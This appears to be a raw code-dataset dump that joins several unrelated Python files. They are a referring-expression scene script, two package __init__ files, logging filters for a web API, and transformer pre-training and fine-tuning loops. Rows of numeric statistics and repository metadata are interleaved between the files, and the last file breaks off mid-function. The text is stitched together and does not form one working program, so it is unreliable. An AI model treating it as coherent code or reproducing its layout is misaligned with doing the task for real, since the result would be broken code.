        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[3] = [[Type, "sphere", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
        ["color", "blue", "r1"], ["color", "blue", "s1"], ["color", "green", "c1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "s1"],["size", "large", "c1"],
        [Rel, "left_of", "s1", "c1"], [Rel, "right_of", "c1", "s1"],
        [Rel, "left_of", "s1", "r1"], [Rel, "right_of", "r1", "s1"],
        ["side", "right", "r1"], ["side", "left", "s1" ], ["side", "right", "c1" ],
        [Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
        [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
        [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[4] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "yellow", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[5] = [[Type, "cube", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
        ["color", "blue", "r1"], ["color", "blue", "s1"], ["color", "green", "c1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "s1"],["size", "small", "c1"],
        [Rel, "left_of", "s1", "c1"], [Rel, "right_of", "c1", "s1"],
        [Rel, "left_of", "s1", "r1"], [Rel, "right_of", "r1", "s1"],
        ["side", "right", "r1"], ["side", "left", "s1" ], ["side", "right", "c1" ],
        [Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
        [Rel, "on", "s1", "f1"], [Rel, "on", "c1", "f1"],
        [Rel, "under", "f1", "s1"], [Rel, "under", "f1", "c1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[6] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "green", "r1"], ["color", "blue", "c1"], ["color", "blue", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "r1", "c2"], [Rel, "right_of", "r1", "c1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
        [Rel, "on", "r1", "f1"],[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "r1"],[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[7] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "yellow", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
        ["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "on", "r1", "c2"], [Rel, "under", "c2", "r1"],
        [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[8] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
        ["color", "blue", "r1"], ["color", "green", "c1"], ["color", "blue", "s1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "s1"],
        [Rel, "left_of", "c1", "s1"], [Rel, "right_of", "s1", "c1"],
        [Rel, "left_of", "r1", "s1"], [Rel, "right_of", "s1", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
        [Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[9] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
        ["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "on", "r1", "c2"], [Rel, "under", "c2", "r1"],
        [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[10] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
        ["color", "blue", "r1"], ["color", "green", "c1"], ["color", "blue", "s1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "s1"],
        [Rel, "left_of", "c1", "s1"], [Rel, "right_of", "s1", "c1"],
        [Rel, "left_of", "r1", "s1"], [Rel, "right_of", "s1", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
        [Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[11] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "yellow", "r1"], ["color", "red", "c1"], ["color", "red", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "on", "r1", "c1"], [Rel, "on", "c2", "f1"], [Rel, "on", "c1", "f1"],
        [Rel, "under", "c1", "r1"], [Rel, "under", "f1", "c2"], [Rel, "under", "f1", "c1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[12] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "blue", "r1"], ["color", "blue", "c1"], ["color", "green", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
        ["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "in_front_of", "r1", "c2"], [Rel, "behind", "c2", "r1"],
        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[13] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
        ["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "red", "s1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "s1"],
        [Rel, "left_of", "c1", "s1"], [Rel, "right_of", "s1", "c1"],
        [Rel, "left_of", "r1", "s1"], [Rel, "right_of", "s1", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
        [Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
        [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
        [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[14] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "green", "r1"], ["color", "blue", "c1"], ["color", "green", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c2"],["size", "small", "c1"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c2"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "in_front_of", "r1", "c2"], [Rel, "behind", "c2", "r1"],
        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[15] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
        ["color", "yellow", "r1"], ["color", "red", "c1"], ["color", "yellow", "s1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "small", "c1"], ["size", "large", "s1"],
        [Rel, "right_of", "s1", "c1"], [Rel, "left_of", "c1", "s1"],
        [Rel, "right_of", "s1", "r1"], [Rel, "left_of", "r1", "s1"],
        ["side", "left", "r1"], ["side", "right", "s1" ], ["side", "left", "c1" ],
        [Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
        [Rel, "on", "s1", "f1"], [Rel, "on", "c1", "f1"],
        [Rel, "under", "f1", "s1"], [Rel, "under", "f1", "c1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[16] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "yellow", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "right_of", "r1", "c1"], [Rel, "left_of", "c1", "r1"],
        ["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "in_front_of", "r1", "c2"], [Rel, "behind", "c2", "r1"],
        [Rel, "on", "r1", "f1"],[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "r1"],[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[17] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "blue", "r1"], ["color", "green", "c1"], ["color", "blue", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
        [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[18] = [[Type, "sphere", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
        ["color", "red", "r1"], ["color", "red", "s1"], ["color", "yellow", "c1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "s1"],["size", "large", "c1"],
        [Rel, "right_of", "c1", "s1"], [Rel, "left_of", "s1", "c1"],
        [Rel, "right_of", "r1", "s1"], [Rel, "left_of", "s1", "r1"],
        ["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
        [Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[19] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "green", "r1"], ["color", "green", "c1"], ["color", "blue", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
        [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
        [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[20] = [[Type, "cube", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
        ["color", "red", "r1"], ["color", "red", "s1"], ["color", "yellow", "c1"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "s1"],
        [Rel, "left_of", "s1", "c1"], [Rel, "right_of", "c1", "s1"],
        [Rel, "left_of", "s1", "r1"], [Rel, "right_of", "r1", "s1"],
        ["side", "right", "r1"], ["side", "left", "s1" ], ["side", "right", "c1" ],
        [Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
        [Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
        [Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    return facts
if __name__ == '__main__':
    # Print the referring expressions generated by each algorithm for each
    # of the 20 GRE3D scenes, one CSV-ish line per (scene, algorithm) pair.
    facts = getFacts()
    ranked_attrs = ["color", "size", Type]
    taxonomy = Taxonomy({})
    # Map relation names to the English phrase used when realising them.
    # BUG FIX: `lambda(lr):` and bare `print` statements are Python-2-only
    # syntax; `lambda lr:` and single-argument `print(...)` behave identically
    # under Python 2 and also parse under Python 3.
    handlers = {
        "in_front_of": lambda lr: "in front of",
        "left_of": lambda lr: "to the left of",
        "right_of": lambda lr: "to the right of"
    }
    for i in range(1, 21):
        fb = FullBrevity(facts[i])
        desc_fb = fb.describe("r1")
        incr = Incremental(facts[i], ranked_attrs, taxonomy)
        desc_incr = incr.describe("r1")
        rel = Relational(facts[i])
        desc_rel = rel.describe("r1")
        print("%#02d,\"Full Brevity\",\"%s\"" % (i, util.generate_phrase(desc_fb, ranked_attrs)))
        print("%#02d,\"Incremental\",\"%s\"" % (i, util.generate_phrase(desc_incr, ranked_attrs)))
        print("%#02d,\"Relational\",\"%s\"" % (i, util.generate_phrase_rel(desc_rel, ranked_attrs, "r1", handlers)))
| 63.477273
| 111
| 0.3697
| 2,172
| 19,551
| 3.268877
| 0.05663
| 0.042254
| 0.070423
| 0.034085
| 0.875915
| 0.86493
| 0.851408
| 0.847746
| 0.844085
| 0.834789
| 0
| 0.06015
| 0.310368
| 19,551
| 307
| 112
| 63.684039
| 0.466439
| 0.00399
| 0
| 0.662879
| 0
| 0
| 0.277766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015152
| null | null | 0.011364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8e77137070213bccc31d185d7b8863d6141f2657
| 221
|
py
|
Python
|
BrickBreaker/Bricks/__init__.py
|
Urosh91/BrickBreaker
|
527564eb7fbab31e215a60ca8d46843a5a13791b
|
[
"MIT"
] | null | null | null |
BrickBreaker/Bricks/__init__.py
|
Urosh91/BrickBreaker
|
527564eb7fbab31e215a60ca8d46843a5a13791b
|
[
"MIT"
] | null | null | null |
BrickBreaker/Bricks/__init__.py
|
Urosh91/BrickBreaker
|
527564eb7fbab31e215a60ca8d46843a5a13791b
|
[
"MIT"
] | null | null | null |
from BrickBreaker.Bricks.brick import *
from BrickBreaker.Bricks.life_brick import *
from BrickBreaker.Bricks.speed_brick import *
from BrickBreaker.Bricks.size_brick import *
from BrickBreaker.Bricks.ball_brick import *
| 36.833333
| 45
| 0.841629
| 29
| 221
| 6.275862
| 0.310345
| 0.43956
| 0.604396
| 0.593407
| 0.725275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090498
| 221
| 5
| 46
| 44.2
| 0.905473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8e80dc7b3123962046c558dcf4af6f336cffaed2
| 396
|
py
|
Python
|
openff/bespokefit/fragmentation/__init__.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 12
|
2020-08-28T20:49:00.000Z
|
2021-11-17T08:50:32.000Z
|
openff/bespokefit/fragmentation/__init__.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 95
|
2020-02-19T18:40:54.000Z
|
2021-12-02T10:52:23.000Z
|
openff/bespokefit/fragmentation/__init__.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 3
|
2021-04-01T04:22:49.000Z
|
2021-04-13T03:19:10.000Z
|
from openff.bespokefit.fragmentation.base import (
FragmentationEngine,
deregister_fragmentation_engine,
get_fragmentation_engine,
list_fragmentation_engines,
register_fragmentation_engine,
)
# Public API of this package: exactly the names re-exported from
# openff.bespokefit.fragmentation.base above.
__all__ = [
    "FragmentationEngine",
    "deregister_fragmentation_engine",
    "get_fragmentation_engine",
    "list_fragmentation_engines",
    "register_fragmentation_engine",
]
| 24.75
| 50
| 0.777778
| 33
| 396
| 8.727273
| 0.424242
| 0.395833
| 0.291667
| 0.333333
| 0.840278
| 0.840278
| 0.840278
| 0.840278
| 0.840278
| 0.840278
| 0
| 0
| 0.151515
| 396
| 15
| 51
| 26.4
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0.325758
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8e84512e3dddac5255d07fee4b7cb177759a1ac3
| 1,600
|
py
|
Python
|
api/filters.py
|
thevickypedia/Jarvis
|
63e15bd6c3d5db3c45bb549cd33ec06fe4a521d9
|
[
"MIT"
] | 59
|
2020-09-08T17:42:09.000Z
|
2022-03-09T07:28:25.000Z
|
api/filters.py
|
thevickypedia/Jarvis
|
63e15bd6c3d5db3c45bb549cd33ec06fe4a521d9
|
[
"MIT"
] | 20
|
2020-10-26T16:10:43.000Z
|
2022-03-23T17:38:38.000Z
|
api/filters.py
|
thevickypedia/Jarvis
|
63e15bd6c3d5db3c45bb549cd33ec06fe4a521d9
|
[
"MIT"
] | 20
|
2020-10-18T00:43:25.000Z
|
2022-03-20T21:04:22.000Z
|
from logging import Filter, LogRecord
class EndpointFilter(Filter):
    """Suppress access-log records for the ``/docs`` endpoint while keeping all others.

    >>> EndpointFilter

    See Also:
        - Subclasses ``logging.Filter`` and overrides its ``filter(record)``
          hook, which returns True to keep a record and False to drop it.
    """

    def filter(self, record: LogRecord) -> bool:
        """Decide whether a record at ``/docs`` should be emitted.

        Args:
            record: The ``LogRecord`` created for the logged event.

        Returns:
            bool:
            False when the message mentions ``/docs`` (drop it), True otherwise.
        """
        message = record.getMessage()
        return "/docs" not in message
class InvestmentFilter(Filter):
    """Suppress access-log records for the ``/investment`` endpoint while keeping all others.

    >>> InvestmentFilter

    See Also:
        - Subclasses ``logging.Filter`` and overrides its ``filter(record)``
          hook, which returns True to keep a record and False to drop it.
    """

    def filter(self, record: LogRecord) -> bool:
        """Decide whether a record at ``/investment?token=`` should be emitted.

        Args:
            record: The ``LogRecord`` created for the logged event.

        Returns:
            bool:
            False when the message mentions ``/investment?token=`` (drop it),
            True otherwise.
        """
        message = record.getMessage()
        return "/investment?token=" not in message
| 32
| 120
| 0.63375
| 193
| 1,600
| 5.253886
| 0.34715
| 0.059172
| 0.025641
| 0.04142
| 0.804734
| 0.804734
| 0.804734
| 0.804734
| 0.721893
| 0.721893
| 0
| 0.001711
| 0.269375
| 1,600
| 49
| 121
| 32.653061
| 0.865697
| 0.67625
| 0
| 0.285714
| 0
| 0
| 0.064789
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d989723b38dfc838e75aa2f5935823f88a325e88
| 14,377
|
py
|
Python
|
utils/model_methods.py
|
jfcann/va-transformer
|
bbf04612770c95d38915f41045cf9f9acb5dad21
|
[
"MIT"
] | null | null | null |
utils/model_methods.py
|
jfcann/va-transformer
|
bbf04612770c95d38915f41045cf9f9acb5dad21
|
[
"MIT"
] | null | null | null |
utils/model_methods.py
|
jfcann/va-transformer
|
bbf04612770c95d38915f41045cf9f9acb5dad21
|
[
"MIT"
] | null | null | null |
import tqdm
import torch
import torch.nn.functional as F
from sklearn.metrics import accuracy_score, balanced_accuracy_score, roc_auc_score, \
mean_squared_error, r2_score, explained_variance_score
class TQLoss:
    """Bundle an overall loss with its token and quantile components.

    The component losses default to None for models that only produce a
    single combined loss.
    """

    def __init__(self, loss, token_loss=None, quant_loss=None):
        # Keep the three figures together so callers can log them as a unit.
        self.loss, self.token_loss, self.quant_loss = loss, token_loss, quant_loss
class PretrainingMethods:
    """Training, evaluation and embedding-export loops for the pre-training stage.

    Wraps a model (expected to expose ``.net.attn_layers.depth``,
    ``.with_values`` and ``.net.token_emb``) and a TensorBoard-style writer.
    """
    def __init__(self, model, writer):
        self.model = model
        clip_value = 0.5
        # NOTE(review): this clips gradients once at construction time, before
        # any backward pass has produced them — likely intended inside the
        # training loop instead; confirm with the author.
        torch.nn.utils.clip_grad_norm_(self.model.parameters(), clip_value)
        self.writer = writer
        self.depth = model.net.attn_layers.depth
    def train(self, train_loader, optimizer, epoch, grad_accum_every=1, gamma=0.5):
        """Run one pre-training epoch and return a TQLoss of epoch-average losses.

        ``gamma`` weights token loss vs. quantile loss when the model also
        predicts values; ``grad_accum_every`` > 1 accumulates gradients over
        that many batches before each optimizer step.
        """
        self.model.train()
        cum_loss = cum_token_loss = cum_quant_loss = 0
        for i, X in tqdm.tqdm(enumerate(train_loader), total=len(train_loader),
                              mininterval=0.5, desc=f'epoch {epoch} training'):
            if self.model.with_values:
                token_loss, quant_loss = self.model(X)
                # Convex combination of the two heads' losses.
                loss = gamma * token_loss + (1 - gamma) * quant_loss
                batch_loss, token_loss, quant_loss = loss.item(), token_loss.item(), quant_loss.item()
                self.writer.add_scalar('batch_loss/train', batch_loss, epoch * len(train_loader) + i)
                cum_token_loss += token_loss
                cum_quant_loss += quant_loss
            else:
                loss = self.model(X)
                token_loss = batch_loss = loss.item()
                self.writer.add_scalar('batch_loss/train', batch_loss, epoch * len(train_loader) + i)
                cum_token_loss += token_loss
            if grad_accum_every > 1:
                # Accumulate gradients; step/zero once per grad_accum_every batches.
                if i % grad_accum_every <= (grad_accum_every - 1):
                    loss.backward()
                if i % grad_accum_every == (grad_accum_every - 1):
                    optimizer.step()
                    optimizer.zero_grad()
            else:
                loss.backward()
                optimizer.step()
                optimizer.zero_grad()
            cum_loss += batch_loss
        epoch_loss = cum_loss / len(train_loader)
        epoch_token_loss = cum_token_loss / len(train_loader)
        epoch_quant_loss = cum_quant_loss / len(train_loader)
        epoch_losses = TQLoss(loss=epoch_loss,
                              token_loss=epoch_token_loss,
                              quant_loss=epoch_quant_loss)
        self.writer.add_scalar('epoch_loss/train', epoch_loss, epoch)
        self.writer.add_scalar('epoch_token_loss/train', epoch_token_loss, epoch)
        self.writer.add_scalar('epoch_quantile_loss/train', epoch_quant_loss, epoch)
        print(f'epoch avg train losses: '
              f'{epoch_loss:.3f}, token: {epoch_token_loss:.3f}, quant: {epoch_quant_loss:.3f}',
              f' (gamma={gamma})')
        return epoch_losses
    @torch.no_grad()
    def evaluate(self, val_loader, epoch, gamma=0.5, prefix='val'):
        """Evaluate on ``val_loader`` and return a TQLoss of epoch-average losses.

        Logs to the writer only when one was supplied; ``prefix`` labels the
        scalar tags (e.g. 'val' or 'test').
        """
        self.model.eval()
        cum_loss = cum_token_loss = cum_quant_loss = 0
        for i, X in tqdm.tqdm(enumerate(val_loader), total=len(val_loader),
                              mininterval=0.5, desc=f'epoch {epoch} evaluation'):
            if not self.model.with_values:
                loss = self.model(X)
                token_loss = batch_loss = loss.item()
                cum_loss += batch_loss
                cum_token_loss += token_loss
            else:
                token_loss, quant_loss = self.model(X)
                loss = gamma * token_loss + (1 - gamma) * quant_loss
                cum_loss += loss.item()
                cum_token_loss += token_loss.item()
                cum_quant_loss += quant_loss.item()
        epoch_loss = cum_loss / len(val_loader)
        epoch_token_loss = cum_token_loss / len(val_loader)
        epoch_quant_loss = cum_quant_loss / len(val_loader)
        epoch_losses = TQLoss(loss=epoch_loss,
                              token_loss=epoch_token_loss,
                              quant_loss=epoch_quant_loss)
        if self.writer is not None:
            self.writer.add_scalar(f'epoch_loss/{prefix}', epoch_loss, epoch)
            self.writer.add_scalar(f'epoch_token_loss/{prefix}', epoch_token_loss, epoch)
            self.writer.add_scalar(f'epoch_quantile_loss/{prefix}', epoch_quant_loss, epoch)
        print(f'epoch avg {prefix} losses: '
              f'{epoch_loss:.3f}, token: {epoch_token_loss:.3f}, quant: {epoch_quant_loss:.3f}',
              f' (gamma={gamma})')
        return epoch_losses
    @torch.no_grad()
    def write_token_emb(self, step, tokens, labeller, seq_len, device):
        """Export token embeddings (with human-readable labels) to the writer."""
        self.model.eval()
        x = torch.tensor(tokens, dtype=torch.int)
        z = torch.Tensor().to(device)
        # Embed in seq_len-sized chunks to bound device memory usage.
        for x_part in torch.split(x, seq_len):
            x_part = x_part.to(device)
            z_part = self.model.net.token_emb(x_part)
            z = torch.cat((z, z_part))
        metadata = [label for label in map(labeller.token2label, x.cpu().numpy())]
        self.writer.add_embedding(z,
                                  metadata=metadata,
                                  global_step=step,
                                  tag='token_embeddings')
class FinetuningMethods:
def __init__(self, model, writer, clf_or_reg='clf'):
self.model = model
self.clf_or_reg = clf_or_reg
clip_value = 0.5
torch.nn.utils.clip_grad_norm_(self.model.parameters(), clip_value)
self.writer = writer
self.depth = model.net.attn_layers.depth
def train(self, train_loader, optimizer, epoch, grad_accum_every=1):
self.model.train()
cum_loss = 0
